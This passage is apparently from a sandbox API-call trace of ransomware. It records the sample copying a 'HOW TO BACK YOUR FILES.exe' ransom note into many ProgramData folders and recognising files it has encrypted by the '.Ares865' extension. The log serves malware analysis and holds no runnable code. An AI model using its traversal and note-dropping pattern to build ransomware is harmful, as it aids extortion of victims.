data\\microsoft\\crypto\\rsa\\s-1-5-18\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.341] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.342] GetLastError () returned 0x0 [0090.342] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.342] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.342] CloseHandle (hObject=0x120) returned 1 [0090.342] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.342] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.342] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfc65d150, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0x66f412c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x66f412c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.342] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.342] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.342] lstrcpyW (in: lpString1=0x2cce484, lpString2="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.Ares865" | out: lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.Ares865") returned="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.Ares865" [0090.342] lstrlenW (lpString="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.Ares865") returned 77 [0090.342] lstrlenW (lpString="Ares865") returned 7 [0090.342] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.342] lstrcpyW (in: lpString1=0x2cce484, lpString2="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.Ares865" | out: lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.Ares865") returned="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.Ares865" [0090.342] lstrlenW (lpString="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.Ares865") returned 77 [0090.342] lstrlenW (lpString="Ares865") returned 7 [0090.342] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.342] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\RSA\\MachineKeys", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\RSA\\MachineKeys") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\RSA\\MachineKeys" [0090.342] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x320fc8 | out: hHeap=0x2b0000) returned 1 [0090.342] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0090.343] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\RSA\\MachineKeys") returned 68 [0090.343] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\RSA\\MachineKeys" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\RSA\\MachineKeys") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\RSA\\MachineKeys" [0090.343] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.343] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\RSA\\MachineKeys\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\crypto\\rsa\\machinekeys\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.343] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.343] GetLastError () returned 0x0 [0090.343] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.343] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.343] CloseHandle (hObject=0x120) returned 1 [0090.344] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.344] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.344] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\RSA\\MachineKeys\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c870f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c870f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.344] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.344] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.344] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\Keys", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\Keys") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\Keys" [0090.344] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1708 | out: hHeap=0x2b0000) returned 1 [0090.344] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0090.344] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\Keys") returned 57 [0090.344] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\Keys" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\Keys") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\Keys" [0090.344] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.344] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\Keys\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\crypto\\keys\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.345] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.345] GetLastError () returned 0x0 [0090.345] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.345] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.345] CloseHandle (hObject=0x120) returned 1 [0090.345] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.345] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.345] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\Keys\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c870f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c870f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.345] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.345] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.345] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\DSS", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\DSS") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\DSS" [0090.345] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1408 | out: hHeap=0x2b0000) returned 1 [0090.345] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0090.345] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\DSS") returned 56 [0090.345] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\DSS" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\DSS") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\DSS" [0090.345] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.345] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\DSS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\crypto\\dss\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.346] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.346] GetLastError () returned 0x0 [0090.346] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.346] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.346] CloseHandle (hObject=0x120) returned 1 [0090.346] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.346] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.346] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\DSS\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c897060, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c897060, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.347] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.347] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.347] lstrcpyW (in: lpString1=0x2cce472, lpString2="MachineKeys" | out: lpString1="MachineKeys") returned="MachineKeys" [0090.347] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b08 [0090.347] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8a) returned 0x320fc8 [0090.347] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b10 | out: ListHead=0x2e7710, ListEntry=0x2e7b10) returned 0x2e7af0 [0090.347] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\DSS\\MachineKeys", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\DSS\\MachineKeys") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\DSS\\MachineKeys" [0090.347] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x320fc8 | out: hHeap=0x2b0000) returned 1 [0090.347] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0090.347] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\DSS\\MachineKeys") returned 68 [0090.347] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\DSS\\MachineKeys" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\DSS\\MachineKeys") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\DSS\\MachineKeys" [0090.347] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.347] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\DSS\\MachineKeys\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\crypto\\dss\\machinekeys\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.348] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.348] GetLastError () returned 0x0 [0090.348] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.348] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.348] CloseHandle (hObject=0x120) returned 1 [0090.348] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.348] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.348] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Crypto\\DSS\\MachineKeys\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c8bd1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.348] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.348] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.348] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance" [0090.348] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0090.348] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0090.348] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance") returned 56 [0090.348] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance" [0090.348] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.349] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\assistance\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.356] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.357] GetLastError () returned 0x0 [0090.357] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.357] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.357] CloseHandle (hObject=0x120) returned 1 [0090.357] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.357] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.357] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c8bd1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.357] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.357] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.357] lstrcpyW (in: lpString1=0x2cce472, lpString2="Client" | out: lpString1="Client") returned="Client" [0090.357] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ae8 [0090.357] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x80) returned 0x2f00d8 [0090.357] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7af0 | out: ListHead=0x2e7710, ListEntry=0x2e7af0) returned 0x2e7ad0 [0090.357] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\Client", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\Client") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\Client" [0090.357] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0090.358] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0090.358] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\Client") returned 63 [0090.358] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\Client" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\Client") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\Client" [0090.358] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.358] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\Client\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\assistance\\client\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.358] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.358] GetLastError () returned 0x0 [0090.358] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.358] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.358] CloseHandle (hObject=0x120) returned 1 [0090.359] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.359] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.359] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\Client\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c8bd1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.359] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.359] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.359] lstrcpyW (in: lpString1=0x2cce480, lpString2="1.0" | out: lpString1="1.0") returned="1.0" [0090.359] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ae8 [0090.359] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x88) returned 0x2e95b0 [0090.359] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7af0 | out: ListHead=0x2e7710, ListEntry=0x2e7af0) returned 0x2e7ad0 [0090.359] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\Client\\1.0", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\Client\\1.0") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\Client\\1.0" [0090.359] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0090.359] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0090.359] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\Client\\1.0") returned 67 [0090.359] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\Client\\1.0" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\Client\\1.0") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\Client\\1.0" [0090.359] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.359] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\Client\\1.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\assistance\\client\\1.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.360] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.360] GetLastError () returned 0x0 [0090.360] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.360] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.360] CloseHandle (hObject=0x120) returned 1 [0090.360] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.360] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.360] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\Client\\1.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, 